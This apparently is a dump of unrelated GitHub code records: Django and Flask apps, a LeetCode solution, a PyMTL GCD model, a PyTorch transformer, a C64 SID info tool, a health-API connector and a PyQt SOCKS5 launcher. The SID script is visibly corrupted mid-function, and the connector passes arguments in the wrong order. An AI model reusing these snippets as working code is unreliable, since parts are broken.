on_delete=models.CASCADE, null=True, blank=True\n    )\n\n\nclass Player(models.Model):\n    first_name = models.CharField(max_length=100, blank=False)\n    last_name = models.CharField(max_length=100, blank=False)\n    plays_on = models.ManyToManyField(\"Team\", through=\"PlaysOn\")\n    is_rookie = models.BooleanField(default=False)\n\n\nclass PlaysOn(models.Model):\n    player = models.ForeignKey(\"Player\", on_delete=models.CASCADE)\n    team = models.ForeignKey(\"Team\", on_delete=models.CASCADE)\n    start_date = models.DateTimeField(auto_now_add=True)\n    end_date = models.DateTimeField(auto_now_add=False, blank=True, null=True)\n\n\nclass Team(models.Model):\n    full_name = models.CharField(max_length=100, blank=False)\n    short_name = models.CharField(max_length=100, blank=False)\n    plays_sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n\n    class Meta:\n        constraints = [\n            models.UniqueConstraint(fields=[\"full_name\"], name=\"unique_name\")\n        ]\n","repo_name":"yuanjaso/sportcred","sub_path":"backend/sportscred/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"32456623893","text":"from flask import Flask, render_template, request, session, redirect, url_for, send_from_directory, Response, stream_with_context\nfrom forms import UploadForm, SignupForm, LoginForm  # SignupForm/LoginForm are used below; assumed to be defined in forms.py\nfrom models import db, User  # assumed location: both db (SQLAlchemy instance) and User are referenced below but were not imported\nfrom werkzeug.utils import secure_filename\nimport os, cv2, glob, time, webbrowser\nimport pandas as pd\n\nUPLOAD_FOLDER = 'uploads'\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:********@localhost/learningflask'\ndb.init_app(app)\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\napp.secret_key = \"development-key\"\n\nwebbrowser.open('http://localhost:5000/home')\n\n@app.route(\"/\")\ndef index():\n#    return render_template(\"index.html\")\n    return redirect(url_for('home'))\n\n@app.route(\"/about\")\ndef about():\n    return render_template(\"about.html\")\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n    if 'email' in session:\n        return redirect(url_for('home'))\n    \n    form = SignupForm()\n    \n    if request.method == 'POST':\n        if not form.validate():\n            return render_template('signup.html', form=form)\n        else:\n            newuser = User(form.first_name.data, form.last_name.data, form.email.data, form.password.data)\n            db.session.add(newuser)\n            db.session.commit()\n            \n            session['email'] = newuser.email\n            return redirect(url_for('home'))\n        \n    elif request.method == 'GET':\n        return render_template(\"signup.html\", form=form)\n    
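The login view that follows calls `user.check_password(password)`, but the `User` model is defined outside this file. A hedged sketch of what such a method typically looks like with Werkzeug's password helpers (class layout assumed, not taken from this repository):

```python
# Illustrative only: a minimal check_password built on Werkzeug's hashing
# helpers; the project's real User model lives in another module.
from werkzeug.security import generate_password_hash, check_password_hash

class User:  # hypothetical stand-in for the SQLAlchemy model
    def __init__(self, email, password):
        self.email = email
        self.pwdhash = generate_password_hash(password)  # never store plaintext

    def check_password(self, password):
        return check_password_hash(self.pwdhash, password)
```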
\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n    if 'email' in session:\n        return redirect(url_for('home'))\n    \n    form = LoginForm()\n    \n    if request.method == 'POST':\n        if not form.validate():\n            return render_template(\"login.html\", form=form)\n        else:\n            email = form.email.data\n            password = form.password.data\n            \n            user = User.query.filter_by(email=email).first()\n            if user is not None and user.check_password(password):\n                session['email'] = form.email.data\n                return redirect(url_for('home'))\n            else:\n                return redirect(url_for('login'))\n            \n    elif request.method == 'GET':\n        return render_template('login.html', form=form)\n\n@app.route('/logout')\ndef logout():\n    session.pop('email', None)\n    return redirect(url_for('index'))\n    \n@app.route(\"/home\", methods=['GET', 'POST'])\ndef home():\n#    if 'email' not in session:\n#        return redirect(url_for('login'))\n    \n    form = UploadForm()\n    image_paths = []\n    \n    if request.method == 'POST':\n        if not form.validate():\n            return render_template('home.html', form=form)\n        else:\n            f = form.upload.data\n            c = form.collection_path.data\n            tfd = form.target_file_dir.data\n            \n            filename = secure_filename(f.filename)\n            template_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n            f.save(template_path)\n            \n            session['c'] = c\n            session['tfd'] = tfd\n            session['filename'] = filename\n            session['template_path'] = template_path\n            \n#            return render_template('home.html', form=form, path=path)\n            return redirect(url_for('processing'))\n        \n    elif request.method == 'GET':\n        return render_template(\"home.html\", form=form, image_paths=image_paths)\n    \n    return render_template(\"home.html\")\n\n@app.route('/uploads/<filename>')\ndef uploaded_file(filename):\n    return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\ndef stream_template(template_name, **context): \n    app.update_template_context(context) \n    t = app.jinja_env.get_template(template_name) \n    rv = t.stream(context) \n    rv.disable_buffering() \n    return rv \n\n@app.route('/processing')\ndef processing():\n    filename = session.get('filename', None)\n    template_path = session.get('template_path', None)\n    c = session.get('c', None)\n    tfd = session.get('tfd', None)\n    \n    fix_c = c.replace('\"', '')\n    folders = os.listdir(fix_c)\n    total = len(folders)\n\n    fix_tfd = tfd.replace('\"', '')\n    \n    path = url_for('uploaded_file', filename=filename)\n    \n    def generate():\n        for i, folder in enumerate(folders):\n            fol = fix_c+'\\\\'+folder\n            image_files = os.listdir(fol)\n            total_infile = len(image_files)\n            target_file_dir = fix_tfd+'\\\\'+os.path.basename(folder)+'_target_file_directory'\n            os.mkdir(target_file_dir)\n            for idx, image in enumerate(image_files):\n                yield 'Currently processing file {} in folder {}'.format(image, folder)\n                img = fol+'\\\\'+image\n                template = cv2.imread(template_path,0)\n                match = cv2.imread(img,0)\n\n                th, tw = template.shape\n                mh, mw = match.shape\n                if mw < tw:\n                    continue\n\n                result = cv2.matchTemplate(match, template, cv2.TM_CCOEFF_NORMED)\n\n                min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n\n                if max_val > 0.6:\n                    cv2.imwrite(target_file_dir+'\\\\'+os.path.basename(image), match.copy())\n#\n#            percentage = int(((i+1)/total)*100)\n#            yield str(percentage)\n#            yield 'folder: {}'.format(folder)\n            \n    rows = generate()\n    return Response(stream_with_context(stream_template('processing.html', rows=rows, fix_c=fix_c, fix_tfd=fix_tfd, path=path, total=total)))\n\n#@app.route('/completion')\n#def completion():\n#    return render_template('completion.html')\n    \nif __name__ == 
\"__main__\":\n app.run(debug=True)","repo_name":"zampetti/collections_app","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8719593256","text":"class Solution:\n def say(self, s):\n if len(s) == 1:\n return '1' + s\n i = 1\n res = []\n c = 1\n while i < len(s):\n if s[i] == s[i-1]:\n c += 1\n else:\n res.append(str(c)+s[i-1])\n c = 1\n i += 1\n res.append(str(c)+s[-1])\n return ''.join(res)\n \n def countAndSay(self, n: int) -> str:\n if n == 1: return '1'\n return self.say(self.countAndSay(n-1))","repo_name":"AhmedCharfeddine/Leetcode-Solutions","sub_path":"38-count-and-say/38-count-and-say.py","file_name":"38-count-and-say.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21552673921","text":"#=========================================================================\n# Gcd Unit FL Model\n#=========================================================================\n# Computes the Gcd of two numbers\n# Accelerator register interface:\n#\n# xr0 : go/result\n# xr1 : operand A\n# xr2 : operand B\n#\n# Accelerator protocol involves the following steps:\n# 1. Write the operand A by writing to xr1\n# 2. Write the operand B by writing to xr2\n# 3. Tell the accelerator to compute gcd and wait for result by reading\n# xr0\n\nfrom fractions import gcd\n\nfrom pymtl import *\nfrom pclib.ifcs import InValRdyBundle, OutValRdyBundle\nfrom pclib.fl import InValRdyQueueAdapter, OutValRdyQueueAdapter\n\nfrom xcel.XcelMsg import XcelReqMsg, XcelRespMsg\n\nclass GcdXcelFL( Model ):\n\n # Constructor\n\n def __init__( s ):\n\n # Interface\n\n s.xcelreq = InValRdyBundle ( XcelReqMsg() )\n s.xcelresp = OutValRdyBundle ( XcelRespMsg() )\n\n # Adapters\n\n s.xcelreq_q = InValRdyQueueAdapter ( s.xcelreq )\n s.xcelresp_q = OutValRdyQueueAdapter ( s.xcelresp )\n\n # Internal State\n\n s.operandA = 0\n s.operandB = 0\n s.result = 0\n\n # Concurrent block\n\n @s.tick_fl\n def block():\n\n go = False\n while not go:\n\n xcelreq_msg = s.xcelreq_q.popleft()\n\n if xcelreq_msg.type_ == XcelReqMsg.TYPE_WRITE:\n\n assert xcelreq_msg.raddr in [1,2], \\\n \"Only reg writes to 1,2 allowed during setup!\"\n\n # Use xcel register address to configure accelerator\n\n if xcelreq_msg.raddr == 1: s.operandA = xcelreq_msg.data\n elif xcelreq_msg.raddr == 2: s.operandB = xcelreq_msg.data\n\n # Send xcel response message\n\n xcelresp_msg = XcelRespMsg()\n xcelresp_msg.opaque = xcelreq_msg.opaque\n xcelresp_msg.type_ = XcelRespMsg.TYPE_WRITE\n s.xcelresp_q.append( xcelresp_msg )\n\n elif xcelreq_msg.type_ == XcelReqMsg.TYPE_READ:\n\n assert xcelreq_msg.raddr in [0], \\\n \"Only reg read to 0 allowed!\"\n\n go = True\n\n # Compute Gcd of the operands\n\n s.result = gcd( s.operandA, s.operandB )\n\n # Send xcel response message indicating xcel is done\n\n xcelresp_msg = XcelRespMsg()\n xcelresp_msg.opaque = xcelreq_msg.opaque\n xcelresp_msg.type_ = XcelRespMsg.TYPE_READ\n xcelresp_msg.data = s.result\n xcelresp_msg.id = xcelreq_msg.id\n s.xcelresp_q.append( xcelresp_msg )\n\n # Line tracing\n\n def line_trace( s ):\n return \"{}(){}\".format( s.xcelreq, s.xcelresp 
)\n\n","repo_name":"cornell-brg/pymtl-tut-hls","sub_path":"ex_gcd/GcdXcelFL.py","file_name":"GcdXcelFL.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"50"} +{"seq_id":"70550730396","text":"import math\nimport torch\nimport torch.nn as nn\n\nfrom src.utils import BOS_ID, EOS_ID, text2ids, ids2text\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model: int, dropout: float = 0.1, max_len: int = 5000):\n super().__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n position = torch.arange(max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2) * (-math.log(10000.0) / d_model))\n pe = torch.zeros(max_len, 1, d_model)\n pe[:, 0, 0::2] = torch.sin(position * div_term)\n pe[:, 0, 1::2] = torch.cos(position * div_term)\n self.register_buffer(\"pe\", pe)\n\n def forward(self, x):\n x = x + self.pe[: x.size(0)]\n return self.dropout(x)\n\n\nclass Transformer(nn.Module):\n def __init__(self, vocab_len: int, d_model: int, nhead: int, dim_feedforward: int, nlayers: int, dropout: float = 0.1):\n super().__init__()\n self.max_len = 400\n\n self.model_type = \"Transformer\"\n self.pos_encoder = PositionalEncoding(d_model, dropout)\n encoder_layers = nn.TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers, nlayers)\n self.embedding = nn.Embedding(vocab_len, d_model)\n self.d_model = d_model\n self.linear = nn.Linear(d_model, vocab_len)\n\n self._init_weights()\n\n def _init_weights(self) -> None:\n initrange = 0.1\n self.embedding.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, src, src_mask=None):\n \"\"\"\n Arguments:\n src: Tensor, shape ``[batch_size, seq_len, batch_size]``\n src_mask: Tensor, shape ``[seq_len, seq_len]``\n\n Returns:\n output Tensor of shape ``[batch_size, seq_len, ntoken]``\n \"\"\"\n src = src.transpose(0, 1)\n src = self.embedding(src) * math.sqrt(self.d_model)\n src = self.pos_encoder(src)\n if src_mask is None:\n src_mask = nn.Transformer.generate_square_subsequent_mask(len(src)).to(src.device)\n output = self.transformer_encoder(src, src_mask)\n output = self.linear(output)\n output = output.transpose(0, 1)\n return {\"logits\": output}\n\n @torch.inference_mode()\n def inference(self, prefix: str = \"\", temp: float = 1.0) -> str:\n self.eval()\n device = next(self.parameters()).device\n\n tokens = [BOS_ID] + text2ids(prefix)\n tokens = torch.tensor(tokens).to(device)\n\n logits = self.forward(tokens.unsqueeze(0))[\"logits\"]\n logits = logits.transpose(1, 2)\n logits /= temp\n\n new_tokens = torch.distributions.Categorical(logits=logits[:, :, -1]).sample()\n tokens = torch.cat([tokens, new_tokens], dim=0)\n\n while tokens.shape[0] < self.max_len:\n if new_tokens.item() == EOS_ID:\n break\n\n logits = self.forward(tokens.unsqueeze(0))[\"logits\"]\n logits = logits.transpose(1, 2)\n logits /= temp\n\n new_tokens = torch.distributions.Categorical(logits=logits[:, :, -1]).sample()\n tokens = torch.cat([tokens, new_tokens], dim=0)\n\n return ids2text(tokens.squeeze())\n","repo_name":"tgritsaev/tinystories","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9188395661","text":"\"\"\"\ndibawah ini terdapat proses inisialisasi 
pembacaan file kedalam variabel lain\nsebagai contoh fnama berisi data-data dari file nama.txt yang telah dibaca\ndengan fungsi \"r\"\n\"\"\"\nfnama = open(\"nama.txt\", \"r\")\nfnpm = open(\"npm.txt\", \"r\")\nfkelas = open(\"kelas.txt\", \"r\")\nfjurusan = open(\"jurusan.txt\", \"r\")\n\nreadnama = fnama.readlines()\nreadnpm = fnpm.readlines()\nreadkelas = fkelas.readlines()\nreadjurusan = fjurusan.readlines()\n#Line 11-14 ini fungsinya sebagai membaca file txt nya berupa string\nprint(\"\"\"\n+--------------------+-----------------+-----------+---------------+\n| NAMA | NPM |KELAS |JURUSAN |\n+--------------------+-----------------+-----------+---------------+\"\"\")\n# Kemudian Membuat tabel dengan Print di design seperti code diatas.\nfor i in range (len(readnama)):\n nama = str(readnama[i].strip())\n print('| '+nama,end='')\n #perulangan for dengan variabel i in range atau dalam jarak seberapa panjang, variabel nama tersebut\n #dan variabel nama = string readnama yang dimasukkan variabel i perulangannya dan strip sebagai menghasilkan karakternya besar atau kecil\n #kemudian cetak +nama,end='' artinya mencetak dengan membuat baris baru ketika mencetak lagi.\n for j in range(20-1-len(nama)):\n print(' ',end ='')\n npm = str(readnpm[i].strip())\n print('| '+npm,end='')\n for k in range(17-1-len(npm)):\n print(' ',end ='')\n kelas = str(readkelas[i].strip())\n print('| '+kelas,end='')\n for p in range(11-1-len(kelas)):\n print(' ',end ='')\n jurusan = str(readjurusan[i].strip())\n print('| '+jurusan,end='')\n for v in range(15-1-len(jurusan)):\n print(' ',end ='')\n #selanjutnya masih sama seperti tadi perulangan for dengan variabel j, k, p, v dalam jarak 20-1-len dan 19-1-len dimasukkan variabel nya masing masing disesuaikan\n #mencetak dengan print untuk baris barunya dan npm = string readnpm yang dimasukkan variabel i perulangannya dan strip sebagai menghasilkan karakternya besar atau kecil\n #lalu cetak lagi dengan akhiran end=\n \n print('|')\n #sebagai penutup dari tabel outputan\n\nprint(\"+--------------------+-----------------+-----------+---------------+\")\n#sebagai bagian bawah dari tabel\n","repo_name":"Fadilano/Tugas-Strukdat","sub_path":"readfile.py","file_name":"readfile.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5911467284","text":"#!/usr/bin/python\n# ----------------------------------------------------------------------------\n# Shows SID info - riq\n# ----------------------------------------------------------------------------\n'''\nLittle tool to display SID info\n'''\nfrom __future__ import division, unicode_literals, print_function\nimport sys\nimport os\nimport struct\n\n#reload(sys)\n#sys.setdefaultencoding('utf8')\n\n\n__docformat__ = 'restructuredtext'\n\n\ndef analyze_sidtracker64(v1, buf):\n # Sidtracker64 v2 first 8 bytes\n # jmp 0x1826 ; 3 bytes\n # ldx #0x00 ; 2 bytes\n # jsr 0x17f8 ; 3 bytes...\n # ignore the first 6 bytes then until we get to the '0x17f8'\n address = struct.unpack_from(\"> 1:\n str_flags += ', PlaySID specific'\n else:\n str_flags += ', C64 compatible'\n\n f = (flags & 0b00001100) >> 2\n if f == 0:\n str_flags += ', Unknown'\n elif f == 1:\n str_flags += ', PAL'\n elif f == 2:\n str_flags += ', NTSC'\n elif f == 3:\n str_flags += ', PAL & NTSC'\n\n f = (flags & 0b00110000) >> 4\n if f == 0:\n str_flags += ', Unknown'\n elif f == 1:\n str_flags += ', 6581'\n elif f == 2:\n str_flags += ', 8580'\n elif f == 3:\n str_flags += ', 
6581 & 8580'\n\n print(\"Flags: %s\" % str_flags)\n\ndef print_freq_tables(v1, load_addr, buf):\n offset = v1[1]\n\n array = buf[offset+2:-1]\n\n lo_freqs = [\n b'\\x16\\x27\\x38\\x4b\\x5f', # PAL\n b'\\x16\\x27\\x38\\x4b\\x5e', # PAL\n b'\\x16\\x27\\x39\\x4b\\x5f', # PAL\n b'\\x17\\x27\\x39\\x4b\\x5f', # PAL\n\n b'\\x0c\\x1c\\x2d\\x3e\\x51', # NTSC\n b'\\x0c\\x1c\\x2d\\x3f\\x52', # NTSC\n b'\\x0c\\x1c\\x2d\\x3e\\x47', # NTSC\n ]\n\n hi_freqs = [\n # with 12 '01's\n b'\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x02\\x02', # PAL\n # with 11 '01's\n b'\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x02\\x02\\x02',\n ]\n\n\n f_lo = None\n f_hi = None\n f_type = 'PAL'\n\n # try to find lo freq table\n for i,lo in enumerate(lo_freqs):\n found = array.find(lo)\n if found != -1:\n f_lo = found\n if i >= 4:\n f_type = 'NTSC'\n break\n\n for hi in hi_freqs:\n found = array.find(hi)\n if found != -1:\n f_hi = found\n break\n\n if f_lo and f_hi:\n print(\"Freq table addr (lo/hi): $%04x / $%04x (%s)\" % (load_addr + f_lo, load_addr + f_hi, f_type))\n else:\n print(\"Freq table addr: not found\")\n\n\ndef run(sid_file):\n f = open(sid_file)\n buf = f.read()\n\n header = buf[0:4]\n if header == 'PSID' or header == 'RSID':\n print(\"File: %s\" % sid_file)\n v1 = struct.unpack_from(\">HHHHHHHI32s32s32s\", buf, 4)\n flags = None\n addr = struct.unpack_from(\"H\", buf, 118)[0]\n addr = struct.unpack_from(\" [str, str, int]:\n res = requests.post(\n f\"{self._url}\",\n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n auth=(self._client_id, self._client_secret),\n data=\"scope=external&grant_type=client_credentials\"\n )\n json = res.json()\n return [json['token_type'], json['access_token'], json['expires_in']]\n\n def get_access_token(self) -> [str, str]:\n if self._token_has_expired():\n t0 = pendulum.now()\n token_type, token, expires_in = self._refresh_token()\n self._token_type = token_type\n self._access_token = token\n self._token_expiry_date = t0.add(seconds=expires_in)\n\n return [self._token_type, self._access_token]\n\n def _token_has_expired(self) -> bool:\n return pendulum.now() > self._token_expiry_date\n\n def __call__(self, r: requests.Request) -> requests.Request:\n token_type, access_token = self.get_access_token()\n r.headers[\"Authorization\"] = f\"{token_type} {access_token}\"\n return r\n\n\nclass NikohealthStream(HttpStream, ABC):\n url_base = \"https://better.nikohealth.com/api/external/\"\n page_size = 100\n include_sensitive_data = False\n\n def __init__(self, domain: str, client_id: str, client_secret: str, **kwargs):\n super().__init__(**kwargs)\n self.domain = domain\n self.client_id = client_id\n self.client_secret = client_secret\n self.url = f\"https://{domain}.nikohealth.com/api/external/\"\n\n def get_json_schema(self) -> Mapping[str, Any]:\n schema = super().get_json_schema()\n if self.include_sensitive_data:\n return schema\n\n schema[\"properties\"] = {\n key: key_schema\n for key, key_schema in schema[\"properties\"].items()\n if \"sensitive\" not in key_schema or key_schema[\"sensitive\"] is False\n }\n\n return schema\n\n def request_headers(\n self,\n stream_state: Mapping[str, Any],\n stream_slice: Mapping[str, Any] = None,\n next_page_token: Mapping[str, Any] = None\n ):\n return {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n decoded_response = response.json()\n previous_query: dict = 
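The `struct.unpack_from(">HHHHHHHI32s32s32s", buf, 4)` call above decodes the big-endian PSID header in one shot. A self-contained sketch of the same idea on a synthetic buffer (field names follow the PSID layout; all values here are made up for illustration):

```python
import struct

# Synthetic PSID-style header, for illustration only.
buf = bytearray(0x76)
buf[0:4] = b"PSID"
struct.pack_into(">HHHHHHHI", buf, 4, 2, 0x7C, 0x1000, 0x1003, 0x1006, 1, 0, 0)
struct.pack_into("32s", buf, 0x16, b"Demo Tune")  # name field, null-padded

version, data_off, load, init, play, songs, start_song, speed, name = \
    struct.unpack_from(">HHHHHHHI32s", buf, 4)
print(version, hex(load), songs, name.rstrip(b"\x00").decode())
```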
urllib.parse.parse_qs(\n urllib.parse.urlparse(response.request.url).query\n )\n previous_page = int(previous_query.get(\"pageIndex\", [\"0\"])[0])\n previous_count = decoded_response.get(\"Count\", 0)\n\n if previous_count > 0 and (previous_page * self.page_size) < previous_count:\n return {\"pageIndex\": previous_page + 1}\n\n return None\n\n def request_params(\n self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None,\n next_page_token: Mapping[str, Any] = None\n ) -> MutableMapping[str, Any]:\n params = {\"pageSize\": self.page_size}\n\n if next_page_token:\n params.update(next_page_token)\n\n return params\n\n def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:\n data = response.json()['Items']\n if isinstance(data, list):\n return data\n return [data]\n\n\nclass Patients(NikohealthStream):\n primary_key = \"Id\"\n\n @property\n def use_cache(self) -> bool:\n return True\n\n def path(\n self, stream_state: Mapping[str, Any] = None, stream_slice: Mapping[str, Any] = None,\n next_page_token: Mapping[str, Any] = None\n ) -> str:\n return \"v1/patients\"\n\n\nclass PatientInsurances(NikohealthStream, HttpSubStream):\n primary_key = 'Id'\n data_field = \"call_metrics\"\n\n def path(\n self,\n *,\n stream_state: Mapping[str, Any] = None,\n stream_slice: Mapping[str, Any] = None,\n next_page_token: Mapping[str, Any] = None\n ) -> str:\n return f\"v1/patients/{stream_slice['parent']['Id']}/insurances\"\n\n\n# Source\nclass SourceNikohealth(AbstractSource):\n _auth: Optional[AuthBase] = None\n\n def auth(self, domain: str, client_id: str, client_secret: str) -> AuthBase:\n if self._auth is None:\n self._auth = NikoAuthenticator(\n client_id=client_id,\n client_secret=client_secret,\n url=f\"https://{domain}.nikohealth.com/api/identity/connect/token\",\n )\n\n return self._auth\n\n def check_connection(self, logger, config) -> Tuple[bool, any]:\n client_id = config[\"client_id\"]\n client_secret = config[\"client_secret\"]\n domain = config[\"domain\"]\n try:\n auth = self.auth(client_id, client_secret, domain)\n res = requests.get(\n f\"https://{domain}.nikohealth.com/api/external/v1/hcpcs?pageSize=10\",\n auth=auth\n )\n res.raise_for_status()\n return True, None\n except Exception as e:\n return False, e\n\n def streams(self, config: Mapping[str, Any]) -> List[Stream]:\n client_id = config[\"client_id\"]\n client_secret = config[\"client_secret\"]\n domain = config[\"domain\"]\n auth = self.auth(domain, client_id, client_secret)\n base_args = dict(\n authenticator=auth,\n client_id=client_id,\n client_secret=client_secret,\n domain=domain\n )\n\n patients = Patients(**base_args)\n return [patients, PatientInsurances(parent=patients, **base_args)]\n","repo_name":"nickydonna/source-nikohealth","sub_path":"source_nikohealth/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":6490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43105661411","text":"import sys\nimport re\nimport socket\nfrom PyQt5.QtWidgets import (QWidget, QToolTip, \n QPushButton, QApplication)\nfrom PyQt5.QtGui import QFont,QPainter,QIntValidator\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QIcon\nfrom De_socks5_ui import Ui_Form\nfrom Network import Network\nimport subprocess\nimport ctypes\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(\"myappid\")\n#from utils import Wuint\n\nclass My_socks(QWidget):\n \n def __init__(self):\n super().__init__()\n 
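`NikoAuthenticator` above plugs into `requests` via the `__call__` hook of `requests.auth.AuthBase`, refreshing its token lazily. The same pattern works for any header-based scheme; a minimal sketch with a static token (URL and token values are placeholders):

```python
import requests
from requests.auth import AuthBase

class BearerAuth(AuthBase):
    """Attach a static bearer token to every request (illustrative only)."""
    def __init__(self, token: str):
        self.token = token

    def __call__(self, r):
        # requests invokes this hook on each prepared request
        r.headers["Authorization"] = f"Bearer {self.token}"
        return r

# resp = requests.get("https://api.example.com/v1/ping", auth=BearerAuth("secret-token"))
```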
self.wired_enable = False\n self.wifi_enable = False\n self.wired_info = None\n self.wifi_info = None\n self.IP = None\n self.DNS = None\n self.GW = None\n self.PORT = None\n self.socks5 = None\n self.ui = Ui_Form()\n self.count = 0\n self.ui.setupUi(self)\n #self.utils = Wuint()\n #print(self.ui.IP1.rect())\n #print(self.ui.IP1.geometry().x())\n self.setWindowTitle('MyLogo')\n self.setWindowIcon(QIcon(\"./img/window.jpg\"))\n\n self.ip_list = [self.ui.IP1, self.ui.IP2, self.ui.IP3, self.ui.IP4]\n self.dns_list = [self.ui.DNS1, self.ui.DNS2, self.ui.DNS3, self.ui.DNS4]\n self.gw_list = [self.ui.GW1, self.ui.GW2, self.ui.GW3, self.ui.GW4]\n self.start_stop_bn_enable(False)\n\n self.timer = QTimer()\n self.timer.timeout.connect(self.process_poll_check)\n\n Port_Intvalidator = QIntValidator()\n Port_Intvalidator.setRange(1001,65535)\n self.ui.port.setValidator(Port_Intvalidator)\n Intvalidator = QIntValidator()\n Intvalidator.setRange(0,255)\n for item in self.ip_list:\n item.setValidator(Intvalidator)\n for item in self.dns_list:\n item.setValidator(Intvalidator)\n for item in self.gw_list:\n item.setValidator(Intvalidator)\n\n self.ui.GetInfo.setStyleSheet(\"QPushButton{border-image: url(img/before.png)}\")\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_before.png)}\")\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_before.png)}\")\n self.ui.GetInfo.clicked.connect(self.background_change)\n self.ui.wired.clicked.connect(self.wired_bg_change)\n self.ui.wifi.clicked.connect(self.wifi_bg_change)\n self.ui.start.clicked.connect(self.start_socks5)\n self.ui.stop.clicked.connect(self.stop_socks5)\n self.ui.dect.clicked.connect(self.port_check)\n self.ui.clear.clicked.connect(self.clear_text)\n\n def check_ipv4(self,items):\n m = None\n result = None\n regular = r'^(((25[0-5]|2[0-4]\\d|1\\d{2})|([1-9]?\\d))\\.){3}((25[0-5]|2[0-4]\\d|1\\d{2})|([1-9]?\\d))$'\n pattern = re.compile(regular)\n if isinstance(items,list) or isinstance(items,tuple):\n for item in items:\n m = pattern.match(item)\n if m is not None:\n result = item\n break\n else:\n m = pattern.match(items)\n if m is not None:\n result = items\n \n return result\n\n\n def process_poll_check(self):\n if self.socks5 is not None:\n if self.socks5.poll() is None:\n pass\n else:\n if self.count < 5:\n self.ui.textBrowser.append(\"Socks5 is close!!!\")\n self.count = self.count + 1\n else:\n self.ui.textBrowser.append(\"Max count=5 is reach\")\n self.stopTimer()\n\n\n def port_check(self):\n try:\n self.PORT = int(self.ui.port.text())\n except ValueError:\n self.ui.textBrowser.append(\"port is not base 10\")\n return False\n if self.IP is None:\n self.ui.textBrowser.append(\"IP is None\")\n return False\n Tcp_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n try:\n Tcp_sock.bind((self.IP,self.PORT))\n Tcp_sock.close()\n self.ui.textBrowser.append(\"ip %s port %s is free\"%(self.IP,self.PORT))\n return True\n except OSError:\n self.ui.textBrowser.append(\"ip %s port %s is using!!!\"%(self.IP,self.PORT))\n return False\n\n\n def startTimer(self):\n self.ui.textBrowser.append(\"Start Timer for check\")\n self.timer.start(100)\n\n def stopTimer(self):\n self.ui.textBrowser.append(\"Stop Timer for check\")\n self.timer.stop()\n\n def start_socks5(self):\n self.ui.start.setEnabled(False)\n if self.port_check():\n str_cmd = \"python ./socks5_main.py --dns {0} --ip {1} --port {2}\"\n if self.IP is not None and self.DNS is not None and self.PORT is not None:\n cmd = 
str_cmd.format(self.DNS,self.IP,self.PORT)\n self.ui.textBrowser.append(cmd)\n #self.socks5 = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n #self.socks5 = subprocess.Popen(cmd)\n self.socks5 = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n self.socks5.stdin.close()\n self.socks5.stdout.close()\n #print(1111)\n #self.socks5 = subprocess.Popen(cmd)\n self.startTimer()\n else:\n self.ui.textBrowser.append(\"port is using or valid!!!\")\n\n def stop_socks5(self):\n self.ui.start.setEnabled(True)\n self.stopTimer()\n if self.socks5 is not None:\n pid = self.socks5.pid\n self.socks5.terminate()\n self.socks5 = None\n self.ui.textBrowser.append(\"%s is terminate\"%(pid))\n\n def set_value(self,item_list,value_list):\n if value_list == None:\n for item in item_list:\n item.clear()\n else:\n for i, item in enumerate(item_list):\n item.setText(value_list[i])\n\n\n def show_ip_gw_dns(self, data):\n self.IP = self.check_ipv4(data[\"IP\"])\n self.DNS = self.check_ipv4(data[\"DNS\"])\n self.GW = self.check_ipv4(data[\"Gateway\"])\n if self.IP is not None:\n ip_list = self.IP.split(\".\")\n self.set_value(self.ip_list,ip_list)\n if self.DNS is not None:\n dns_list = self.DNS.split(\".\")\n self.set_value(self.dns_list,dns_list)\n if self.GW is not None:\n gw_list = self.GW.split(\".\")\n 